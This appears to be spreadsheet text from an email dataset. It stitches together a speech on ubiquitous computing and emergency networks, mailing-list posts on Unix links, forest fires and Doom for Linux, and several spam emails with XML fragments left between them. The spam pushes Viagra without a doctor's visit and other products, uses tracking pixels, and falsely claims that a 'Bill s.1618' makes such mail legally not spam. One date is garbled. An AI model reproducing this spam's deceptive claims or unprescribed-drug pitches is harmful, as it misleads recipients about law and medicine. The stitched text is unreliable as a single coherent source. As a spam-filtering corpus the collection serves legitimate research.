    So, I'm now fresh back from Colorado, from the yearly 
 meeting of the High Ground Design Conversation.  These are 
 my best pals in the industrial design world, some dear, 
 long-time friends of mine, whose judgment I always trust.  
 And why would a science fiction writer trust the judgment 
 of industrial designers?  Well, because they're very 
 *trendy.*  They're very shrewd,  and very stylish, and very 
 hands-on people.  They're  peculiarly self-effacing and modest,
 yet quite  imaginative.  Better yet, they're even practical.  
 So they're kind of like science fiction writers, only with 
 much better shoes.
     Usually when I go to this High Ground event, I just 
 deliver some wacko chat about popular aspects of 
 cyberculture and then I take some worshipful notes.  But!  
 I have to report that when I took them my notes from the 
 "CRA Grand Challenges in Computation" conference, I was 
 bringing the noise.
     This is the first time I have ever seen their jaws 
 drop.  They're still kinda wringing their hands over the 
 dotcom boom and the Ka-boom. They miss those glory days of 
 the World Wide Web == because for them, that was the 
 Graphic Designers Full Employment Act.  So they're pretty 
 broke, and they're a little shell-shocked, so I guess they 
 should join the club.  But  when I brought them *this* 
 stuff == a rather extensively worked-out vision in 
 worldbuilding from the point of view of ubiquitous 
 computation in the 21st century...  Well, of course this 
 is merely a scenario, but to me, "911.net" smells like the 
 future.
      And frankly, it doesn't smell good.  But that's all 
 right.  Because these aren't good times.  These are rather 
 harsh, dark times, and in its own peculiar way, 911.net is 
 a similarly harsh, dark concept.
     "Ubiquitous computation" is by no means a new idea.   
 The guy who invented the term is dead, and even his R&amp;D 
 lab doesn't look all that great these days.  Ubicomp has 
 been around for quite some time == in the table-napkin, 
 handwaving stage.  But it's lacked the means, motive and 
 opportunity to get any real-world traction.
    I believe that may be changing.  If so, it's mostly due 
 to the events of September 11.  After that experience, 
 ubicomp has got motive and opportunity as it never had 
 before.  And the means, although they are still 
 speculative, are starting to make some sense.
     What am I talking about when I use the term "ubicomp"?  
 Well, the term is a grab-bag, a congelation of different 
 technologies.  Some are here, commercially available off 
 the shelf; some are in the lab; and some may be physically 
 impossible.
     Let's get down to some brass virtual tacks.  What are 
 the key technical drivers for widely distributed, self-
 organizing networks of sensors, processors and actuators, 
 embedded in the physical world?  And what do you do with 
 these things?
     Okay, number one:  fuel cells.  Not chemical 
 batteries.  Small, portable, dependable, long-lasting, 
 power sources with some punch.  They may not be fuel cells 
 as they are now known.  They might be MEMS fuel cells, or 
 aluminum-air cells, or something enzymatic, I don't care; 
 just something much, much better than today's batteries.  
 Portable power is the crux.  Ubicomp's  future, if it has one,
 entirely hinges on this.  If we don't get some seriously 
 advanced,  portable sources of power then everything I am 
 about to tell you is a sci-fi phantasm. (Not that there's 
 anything wrong with that!)
     Number two, RFID.  Radio-Frequency ID == gotta have 
 some taggers.  Gotta be on the Net.  It'd be nice if they 
 had some powered processors in them.  Something internal, 
 pervasive, a little computational action that is going on 
 inside physical objects.
     Number three, wireless broadband.  Getting real close 
 here.
    Number four, dongles.  I think this part is seriously 
 underappreciated.  This is the weird part of ubicomp, the 
 part that may turn out to be its Achilles heel:  some way 
 to turn the damn thing off.  And to *know* it's off.  The 
 problem of the authorized user.  The authorized 
 administrator, the authorized access.  This is likely to 
 play out as ubicomp's functional equivalent of the 
 Internet's intellectual-property problem.  In other words, 
 it's a very serious issue which is going to be neglected 
 from the get-go, as people are eagerly building the basic 
 infrastructure.  Then, as they lamely try to build it in 
 later, they are going to find out that they have 
 inadvertently poisoned the water-stream for everybody.
     You don't want to wander into a Kazaa and Napster 
 version of George Orwell.  Ubiquitous computation, unlike 
 information, does not "want to be free."  This is not a 
 technology of freedom. Ubiquitous computation wants to 
 make you its slave. Try to remember that, for all our 
 sakes, all right?  This is not a water-cooler for gossip, 
 like the Internet is.  This is a hard-case, hard-times, 
 hands-on, rather ruthless command-and-control system.
     Number five, GPS, global positioning systems.  Been 
 there, done that.
     Number six, convoy traffic.  I think this is also 
 underestimated, for when I started looking at serious 
 applications for ubicomp, time and again, rapidly shipping 
 large amounts of physical material in and out of the 
 ubicomp zone is a killer application.  Getting stuff in, 
 numbering it, assembling it, moving it out. Lots of it. 
 Train loads, truck loads, bus loads. And airlifts.
     Bringing up the van, a whole bunch of other ubi-stuff, 
 of varying degrees of use and practicality.  High speed 
 fiber optic networks, check.  Massive storage and routers, 
 check.  Big databases, check, but they need to be fast and 
 flexible. Some "MobiHoc" action: mobile ad-hoc self-
 assembling networks: networks that are always 
 reconfiguring in real-time, always on the move.  
     Facial recognition has a considerable number of 
 ubicomp applications, by no means all of them good.  Human 
 presence-sensing systems?  Oh yes.  Ruggedized hardware 
 suitable for outdoor deployment in all conditions and 
 weathers.  Real-time simulation of ongoing major 
 situations.  Toxin detectors of various kinds, 
 environmental monitoring of almost every sort, biometric 
 ID...  I have a long list of these.  I'm cross-checking 
 them.  I'm using them to build scenarios.
     One thing about 911.net makes it very distinct from 
 earlier visions of ubicomp.  This is not Microsoft Windows 
 for Housekeeping.  This is a hard, tough web that you 
 throw down fast over dire emergencies.  The key concept 
 here is that we are finally moving computation out of the 
 ivory tower, for good and all.  No more glass boxes of the 
 1950s, no more clean abstractions of cyberspace.  We are 
 deploying computation at unheard-of speed, into the 
 darkest, dirtiest, most dangerous places in the world.
     It is a resilient security apparatus for emergencies. 
 That is 911.net.  
     Now, you might well argue that ubicomp is very 
 invasive of privacy.  That's just what my industrial 
 design pals said about it, immediately, and they were 
 right.  It's been hard to find reasonable deployments for 
 ubicomp in peacetime commerce and in private homes, 
 because it is so Orwellian. However.  Under certain 
 circumstances, other social circumstances do trump this 
 issue.
     For instance, when you are breathing your last under a 
 pile of earthquake rubble, you don't really care much 
 about privacy under your circumstances.  What you really 
 want is  a smart bulldozer, a tourniquet, and some direct 
 pressure against your open wounds.  And that is what 
 911.net is about == or will be about, should it find its 
 way out of the computer-science talking-shop and into 
 daylight.  
      It is an emergency response system for the planet's 
 open wounds.  And those wounds exist in plenty.  There are 
 more of them all the time.
     I rather doubt that the Orwellian version of ubicomp 
 has much of a future.  That's a scenario that I have 
 dubbed "Terrorspace", which is ubicomp in the context of 
 airports and nuclear power sites.  If you've been in 
 airports recently, I believe you are seeing a pretty apt, 
 early version of Terrorspace.  At any random moment, you 
 can have your possessions rifled through by strangers.  
 Your shoes are scanned, and various small but vital 
 objects in your pockets can be confiscated by semi-
 educated security geeks.  They're either pathetically 
 under-trained for the job (in which case you certainly 
 feel no safer), or else they are intelligent and capable 
 people (in which case you pity them and wish they had some 
 other job, for the sake of general human happiness and the 
 GNP).  Rather than making us any safer, Terrorspace 
 airports serve as political indoctrination centers that 
 humiliate our voting population on a broad scale. They are 
 meant to inure us to ever-escalating levels of 
 governmental clumsiness and general harm.
     The difficulty with this Terrorspace approach is that 
 airports and airlines are going broke.  Airports are 
 hemorrhaging money trying to maintain this terrorspace 
 apparatus.  It is likely to spread to the brittle power of 
 nuclear power plants, nuclear waste dumps, bio-sites, 
 chemical sites, liquid petroleum gas centers and so forth. 
 That will hugely increase the overhead of all these 
 dangerous industries. 
     That's a very considerable tax burden.  So, though 
 Terrorspace may serve as a full employment program for the 
 loyal and slightly stupid, that's not going to pay off 
 socially or economically in the long run.
    However, 911.net is a different matter.   An air-
 deployable 911.net that allowed first responders to 
 rapidly deal with fires, floods and other major disasters 
 would *save* money, especially for the insurers, who are 
 already on the ropes.
     The actual September 11 event, 9/11, was a rare and 
 remarkable thing.  And, with fewer than 3,000 people dead, 
 it's just not that big a deal as genuine catastrophes go.  
 Politically, theologically and militarily it was huge, but 
 a workaday 911.net wouldn't fret much about terrorism.  
 Instead, it would have to deal mostly with floods, fires, 
 climate change, earthquakes, volcanoes and (let's hope 
 never) asteroids and weapons of mass destruction.
    So, basically, with 911.net, we are describing a social 
 re-definition of computer geeks as firemen.  Native 
 twenty-first century computer geeks as muscular, with-it, 
 first-responder types.  I think this would be pretty good 
 for the computer industry.  We all need to take the 
 dysfunctional physical world far more seriously.  This 
 week, Italy's flooding, Texas is flooding, Colorado's on 
 fire.  This morning, the brand-new wilderness forests 
 around the site of the former Chernobyl are on fire, 
 spewing radioactive ash hither and yon.   Chunks of 
 Antarctica the size of Rhode Island have fallen into the 
 sea. I could go on.
     This is the sort of activity that humanity is required 
 to deal with in this new century. If we build a successful 
 method with which to do this, those useful tactics will 
 spread across the fabric of our civilization.  I believe 
 they are already spreading.  An innovation like 911.net 
 will likely serve as a camel's nose in the tent for a 
 whole series of ubicomp applications across society.
     I've been speculating about these new forms of 
 ubicomp, and giving them some flashy neologisms, because 
 that is what science fiction writers bring to the table.  
 We build little scenario worlds and make up names for 
 them.  First we've got "911.net," then "Terrorspace," but 
 there are others.
 BATTLESPACE.  A term already much-used by the Pentagon.  
 Battlespace means military C4ISR. The "Revolution in 
 Military Affairs."  I would point out that the military, 
 unlike some sectors, is not reneging on their enthusiastic 
 commitment to the digital revolution.  On the contrary.  I 
 haven't seen anybody in the military saying that they long 
 to go back to the good-old-fashioned, solid, easy-to-
 understand methods of the War in Vietnam.  The military 
 are very into "network-centric warfare," and they couldn't 
 be happier about their spysats and surveillance drones.
 PROSTHETIC UBICOMP.  This is eldercare.  A huge, steadily 
 growing market. Alzheimer's disease is a flat-out domestic 
 catastrophe that lasts seven years.  Any computational 
 help here == in elder-proofing spaces, tracking the sick 
 and so forth == would be of huge benefit to society.
 CRADLE.NET.  Babies have no privacy.  Children have little 
 privacy. Child-proofing a room against a crawling tot... 
 if you've ever done this, you can realize how much use it 
 might be to have this process automated.  Any two-year-old 
 always wonders:  "Why can't Mr Fork and Miss Wall Socket 
 be friends?"  A real-time checklist, at the very least!  
 And then we're faced with the interesting, large-scale 
 prospects of "K-12.net."
 STREET.NET.  This would be traffic management and urban 
 systems management.  Water networks, power networks,
 subways, sidewalks and so forth.
 PUNISH.NET.  Two million people are in the American prison 
 population.  They've got no privacy.  They've gotta be 
 watched all the time.  They're basically crammed in iron 
 cages now.
 INDUSTRIAL UBICOMP. Managing supply chains, industrial 
 assembly and so forth.  This will eventually be the 
 biggest application.
 SO/HO UBICOMP.  Ubicomp in the home, the home office and 
 small office.  Some very interesting consumer uses here, 
 but in the grand scheme of things, not that big a deal.
 SAFETYSPACE.  These would be military bases, U.N. safety 
 zones, refugee camps, and disaster evacuation centers.  
 It's fairly easy to imagine ubiquitous computation as a 
 sinister "gated community" that walls off privileged areas 
 under threat.  But we can also think of it as importing 
 some human comfort, solidarity, mercy and safety into 
 various benighted areas that are severely disturbed.  One 
 can imagine a Gorazde UN safe zone version of this, new 
 and improved of course: a black helicopter ghosts over in 
 the dead of night, deploys a scattering of small drones, 
 smart-mines and sensors, and suddenly the war just stops 
 within these bounds of Safetyspace.  Rapine, looting, 
 sacking, smashing and burning are  ruled out of existence 
 through computer awareness.  The handiness of a technique 
 like that for life in the 21st century... well, it might 
 be a bit underestimated.
 And last, coming up with a bullet should the good times 
 return in all their carefree glory:  UBITOPIA.  This I 
 take to be ubicomp as an Urban Entertainment Destination.  
 You go there for fun just because there is cool, wacky 
 stuff embedded in the physical world, and it's behaving in 
 a way that brings joy and hilarity and good spirits, like 
 the funhouse mirror at a digital carnival.  
     When and if Ubitopia really hits, it will mean that 
 humanity's basic relationship with our material goods has 
 been radically redefined.  That is the apotheosis of 
 ubiquitous computation. Just: material goods, and the way 
 we deal with them, are different.  Different in character, 
 different in quality.  Not recognizable by 20th century 
 standards.
      So. I have no idea if the Homeland Security 
 department, or FEMA or DARPA or the NSF, are going to pony 
 up any money for any of these notions.  That's not my 
 lookout.  I'm a science fiction writer.  And ladies and 
 gentlemen, with this material, I have struck platinum.  
 This stuff is really hot.  This is a great, attractive, 
 contemporary idea that is really new, really different, 
 and really ominous.  The implications are huge and they 
 spread across the board of society. I am going to be a 
 very busy guy with this material.  If you want to help me, 
 send some email.
 Thanks a lot for your attention.
 O=c=O O=c=O O=c=O
 IT'S HERE
 IT'S THERE
 IT'S EVERYWHERE
 O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 08:24:47PM +0100, Aidan Kehoe wrote:
 &gt;  Ar an 20 l de m 7, scrobh kevin lyda :
 &gt;  &gt; actaully i think soft links were invented because you can't hard link
 &gt;  &gt; directories. 
 &gt; But you could hard link directories, back when soft links were
 &gt; being invented, AFAIK. 
 that was before my time.  all unix systems i've used didn't allow hard
 links to directories, or if they did they were restricted to root.
 the reason why is because you could cause infinite loops in the kernel -
 usually a bad place for infinite loops.
 &gt;  &gt; apparently some systems limited soft links to the same device but
 &gt;  &gt; gave up after a while.  
 &gt; Why?
 to make them consistent with hard links.
 &gt; A better way of doing it would be a) have global unique filesystem
 &gt; identifiers for every FS created (such that the chance of two of them
 &gt; clashing is miniscule; 64 bits creatively used would do it, I'd say),
 &gt; and b) implement the target info for the soft link as a {FSID, inode}
 &gt; pair; the OS can work out if the thing linked to is now on a different
 &gt; mount point, or has been moved. (HFS fans, is that what's done? Or are
 &gt; aliases implemented differently?)
 let's call these super-soft-links.  ln -ss
     % ln -ss foo bar
     % ls -i foo
     111 foo
     % mv floyd foo
     % ls -i foo
     222 foo
 and now bar no longer points to foo.
     % ln -ss foo bar
     % ls -i foo
     111 foo
     % rm foo
     % touch floyd
     % ls -i floyd
     111 floyd
 the fs would need to maintain a table of links going the other direction.
 so when the move command unlinks foo in the first example, it could
 check the table and mark that bar is now disconnected.  the same would
 be true for the second example - and even more important since bar points
 to floyd if no table is consulted.
 and this all fails to handle nfs mounted file systems or filesystems
 that have dynamic inodes (the fat fs's and reiser lacks inodes i think).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</si>
  <si>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On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote:
 &gt; A Forest Service official has stated flat out that the tree lovers need to 
 &gt; understand their responsibility in contributing to the number of 
 &gt; uncontrollable (i.e., crown fires caused by very dense tree stands and 
 &gt; under growth) fires by their suits to stop any tree removal from the 
 &gt; forests managed by the Forest Service.
 Boy, that is rather strange. I've always been under the impression that
 the uncontrollable forest fires were the result of the Forest Service's
 long-standing "10:00 A.M. policy", in place until the decision in 1963 to
 switch over to "let-it-burn".
 The 10:00 A.M. policy was based on theories about forest management from
 Europe, and wasn't as applicable to the American wilds. So, we went from a
 policy of containment for 100 years to one of letting things burn unless they
 directly threatened property.
 40 years after the end of the containment policy there is still a lot of stuff
 left to burn. I can't imagine that artificially planted replacement
 forests, with dense stands of identical trees, help that much either. 
 I would be comfortable laying the fault for these contributing factors
 squarely with the Forest Service. I would put the blame for many burned homes
 upon the people who chose to build their dwelling with an unwise combination of
 materials, location, and landscaping.
 -- 
 njl
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Men-Get Hard - Stay Hard!! 8454
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by Pharmacy Online (ookrmkdg@yahoo.com) on Sunday, May 19, 19102 at 12:53:32
 ---------------------------------------------------------------------------
 body: 
 **Viagra Without A Doctor's Appointment!!
 **Fill Out Our Simple Online Form
 **Our Doctor's Will Approve You In Minutes!
 **Receive Your Prescription In 24 Hours By Fed Ex!!
 **Other Prescriptions Are Available Also!
 Click below:
 http://www.globalrxco.com/main2.php?rx=16864
 ********************************************************************************************
 To be removed from future mailing, please click below
 http://61.129.81.68/remove/remove.htm
 **************************************************************** 
 Anti-SPAM Policy Disclaimer: Under Bill s.1618 Title III 
 passed by the 105th U. S. Congress, mail cannot be 
 considered spam as long as we include contact 
 information and a remove link for removal from this 
 mailing list. If this e-mail is unsolicited, please accept 
 our apologies. Per the proposed H.R. 3113 Unsolicited 
 Commercial Electronic Mail Act of 2000, further 
 transmissions to you by the sender may be stopped at 
 NO COST to you 
 **************************************************************** 
  0163
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Doom for Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">Ryan, Shane wrote:
 &gt; hi all,
 &gt; 
 &gt; I'm looking to get my hands on
 &gt; either Doom I or II for my PC.
 &gt; Unfortunately I cannot access 
 &gt; IDSoftware's site because of
 &gt; the silly web-filtering system
 &gt; in place here.
 &gt; 
 &gt; Does anyone know where I can
 &gt; buy a copy of Doom (which I will
 &gt; be running on Linux...) online?
 &gt; Last time I asked in Game they laughed
 &gt; at me ;]
 &gt; 
 &gt; I would ask to swap for Linux software
 &gt; but that wouldn't be ethical or legal.
 &gt; Hence the purchasing question.
 &gt; 
 &gt; Regards,
 &gt; Shane
 &gt; 
 there was a copy of Doom 1 that came free with RedHat 5.2 - 
 unfortunately, it doesn't seem to be on the newer CDs.
 get the last laugh by going in, and saying that ID soft actually 
 released a Linux wrapper for the game. you need to buy the CDs, though, 
 then download the free wrapper.
 -- 
 Kae Verens
 http://www.contactjuggling.org/users/kverens/
 http://www.contactjuggling.org/ (webmaster)
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SYSTEMWORKS CLEARANCE SALE_LIMITED QUANTITIES_ONLY $29.99 8785
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="3" cellspacing="3" width="80%" cellpadding="3" bgcolor="#800000" bordercolor="#C0C0C0"&gt;
   &lt;tr&gt;
     &lt;td width="100%"&gt; 
         &lt;p align="center"&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="5" color="#FFFF00"&gt;&lt;b&gt;Norton 
           SystemWorks 2002 Software Suite&lt;br&gt;
           Professional Edition&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;b&gt;
         &lt;font size="5" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;6&lt;/font&gt;&lt;font size="5"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt; 
           Feature-Packed Utilities, &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#000000"&gt; 
         &lt;font color="#FFFFFF"&gt;1&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt; Great Price&lt;br&gt;
           A &lt;/font&gt; &lt;font color="#FFFFFF"&gt;$300.00+&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt; Combined Retail Value for Only &lt;/font&gt; 
           &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;$29.99!&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;&lt;br&gt;
           Includes &lt;/font&gt; &lt;font color="#FFFFFF"&gt;FREE&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt; Shipping!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;b&gt;
         &lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;Don't 
         allow yourself to fall prey to destructive viruses&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;b&gt;
         &lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;Protect 
         your computer and your valuable information&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" color="#FF0000" size="5"&gt;
       &lt;a href="https://www.bulkherbal.com/ordersystemworks.html" style="text-decoration: none; background-color: #FFFF00"&gt;
       &lt;font color="#000000"&gt;CLICK &lt;/font&gt;&lt;font color="#FF0000"&gt;HERE&lt;/font&gt;&lt;font color="#000000"&gt; 
       FOR MORE INFO AND TO ORDER&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p align="center"&gt;&lt;font face="Tahoma" size="1" color="#FFFFFF"&gt;
     _______________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
     &lt;p align="center"&gt;&lt;font face="Tahoma" size="1" color="#FFFFFF"&gt;We hope you enjoy 
 receiving &lt;b&gt;Marketing Co-op&lt;/b&gt;'s special offer emails. You have received this 
 special offer because you have provided permission to receive third party email 
 communications regarding special online promotions or offers. However, if you 
 wish to unsubscribe from this email list, please &lt;/font&gt;
 &lt;font face="Tahoma" size="1" color="#666666"&gt;
 &lt;a href="mailto:REMOVEME@btamail.net.cn"&gt;&lt;font color="#FFFFFF"&gt;click here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face="Tahoma" size="1" color="#FFFFFF"&gt;. 
 Please allow 2-3 weeks for us to remove your email address. You may receive 
 further emails from&lt;br&gt;
 us during that time, for which we apologize. Thank you.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/div&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Job Offers and My Resume
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000217.html
 Date: 2002-10-02T22:22:55-08:00
 The business news of the day has long been telling us that we're in a very slow 
 economic period. Yet I've received multiple job solicitations recently. Not 
 random head-hunters or anything. People I know, who know me relatively well, 
 want...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE ALL NATURAL SEXUAL STIMULANT!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;  
 &lt;HEAD&gt;
 &lt;style type="text/css"&gt;
   &lt;!--
 .unnamed1 {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11pt}
 .unnamed2 {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 15pt; font-weight: bold; color: #FFFFFF}
   --&gt;
 &lt;/style&gt;
   &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body BGCOLOR="#ffffff" leftmargin="0" topmargin="0" MARGINWIDTH="0"
 MARGINHEIGHT="0"&gt;
 &lt;img src="http://track.4optinonly.com/tev.asp?eid=15197" height="1" width="1"&gt;
 &lt;P&gt;&lt;CENTER&gt;&lt;TABLE WIDTH="450" BORDER="0" CELLSPACING="0" CELLPADDING="20" BACKGROUND="#7684A2"&gt;
   &lt;TR&gt;
     &lt;TD WIDTH="100%" ALIGN="CENTER" VALIGN="TOP" BGCOLOR="##7684A2"&gt;&lt;TABLE
       WIDTH="601" BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;
         &lt;TR&gt;
           &lt;TD WIDTH="600"&gt;&lt;TABLE WIDTH="600" BORDER="0" CELLSPACING="0"
             CELLPADDING="0"&gt;
               &lt;TR&gt;
                 &lt;TD HEIGHT="16" COLSPAN="2"&gt;&lt;IMG SRC="http://64.251.7.133/15197/bar.gif"
                   WIDTH="600" HEIGHT="15" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/TD&gt;
               &lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD BGCOLOR="#ffffff" WIDTH="378" VALIGN="TOP"&gt;&lt;TABLE WIDTH="378"
                   BORDER="0" CELLSPACING="0" CELLPADDING="5"&gt;
                     &lt;TR&gt;
                       &lt;TD ALIGN="CENTER"&gt;&lt;TABLE WIDTH="100%" BORDER="0" CELLSPACING="0"
                         CELLPADDING="0"&gt;
                           &lt;TR&gt;
                             &lt;TD BGCOLOR="#a4a4a4" ALIGN="CENTER"&gt;&lt;IMG SRC="http://64.251.7.133/15197/anim.gif"
                               WIDTH="357" HEIGHT="37" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/TD&gt; 
                           &lt;/TR&gt;
                         &lt;/TABLE&gt;&lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;P&gt;&lt;span class="unnamed1"&gt;We're so sure that ProSeXtra is your
                         best chance for super sex at any age that we're willing to prove
                         it to you! Take advantage of the special offer below for your
                         &lt;B&gt;&lt;FONT COLOR="#990000"&gt;FREE&lt;/FONT&gt;&lt;/B&gt; trialpack of ProSeXtra!
                         &lt;/span&gt;&lt;/P&gt;
                         &lt;P CLASS="unnamed1"&gt;We've removed the risk, now you're out of
                         excuses. Use the offer below and take your first step towards
                         the best sex of your life!&lt;/P&gt;
                         &lt;P CLASS="unnamed1"&gt;&lt;B&gt;&lt;FONT COLOR="#990000"&gt;What are you waiting
                         for, sign up for you FREE trialpack of ProSeXtra today!&lt;/FONT&gt;&lt;/B&gt;
                       &lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD ALIGN="CENTER"&gt;&lt;a href="http://track.4optinonly.com/clicktrack.asp?eid=15197&amp;url=http%3A%2F%2Fwww1%2Eprosextra%2Ecom%2Fcgi%2Dbin%2Fprosextra%2Estorefront%2FEN%2Faddtobasket%2F1005%3FLinkID%3Daa020515%2D1"&gt;&lt;IMG 
                         SRC="http://64.251.7.133/15197/button.gif"
                         WIDTH="287" HEIGHT="75" BORDER="0" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/A&gt;&lt;/TD&gt; 
                     &lt;/TR&gt;
                   &lt;/TABLE&gt;&lt;/TD&gt;
                 &lt;TD BGCOLOR="#ffffff" WIDTH="222" ALIGN="CENTER" VALIGN="TOP"&gt;&lt;IMG 
                   SRC="http://64.251.7.133/15197/acct.jpg"
                   WIDTH="212" HEIGHT="349" hspace="5" vspace="5" NATURALSIZEFLAG="0"
                   ALIGN="BOTTOM"&gt;&lt;/TD&gt; 
               &lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD HEIGHT="16" COLSPAN="2"&gt;&lt;IMG SRC="http://64.251.7.133/15197/bar.gif"
                   WIDTH="600" HEIGHT="15" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD BGCOLOR="#000000" WIDTH="1"&gt;&lt;IMG SRC="http://64.251.7.133/15197/trns.gif"
             WIDTH="1" HEIGHT="1" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/TD&gt; 
         &lt;/TR&gt;
         &lt;TR BGCOLOR="#000000"&gt;
           &lt;TD COLSPAN="2" HEIGHT="1"&gt;&lt;IMG SRC="http://64.251.7.133/15197/trns.gif"
             WIDTH="1" HEIGHT="1" NATURALSIZEFLAG="0" ALIGN="BOTTOM"&gt;&lt;/TD&gt;
         &lt;/TR&gt;
       &lt;/TABLE&gt;&lt;BR&gt;
       &lt;HR WIDTH="500"&gt;&lt;BR&gt;
       &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
         &lt;TR&gt;
           &lt;TD WIDTH="100%"&gt;
             &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;You are receiving this email
             as a subscriber to the eNetwork mailing list. To remove yourself
             from this and related email lists click here:&lt;BR&gt;
             &lt;a href="mailto:remove@4optinonly.com"&gt;UNSUBSCRIBE MY EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;&lt;BR&gt;
             Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
             301, Paragraph(a)(2)of S. 1618, a letter cannot be considered
             Spam if the sender includes contact information and a method
             of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
           &lt;/TD&gt;
         &lt;/TR&gt;
       &lt;/TABLE&gt;&lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: add logos and tones to your cell phone 1575332211111
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;table width="350" border="0" cellspacing="0" cellpadding="0" align=center&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;b&gt; &lt;center&gt;Take yourself out of our list &lt;a href=http://freesite010.friendly-hosting.com/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
 &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#FF0000" size="6"&gt;BORED 
               WITH &lt;br&gt;
               YOUR CELL PHONE?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;
               &lt;table width="335" border="0" cellspacing="3" cellpadding="0" bgcolor="#0000CC"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#FFFF00" bordercolor="#FFFFFF"&gt; 
                     &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;br&gt;
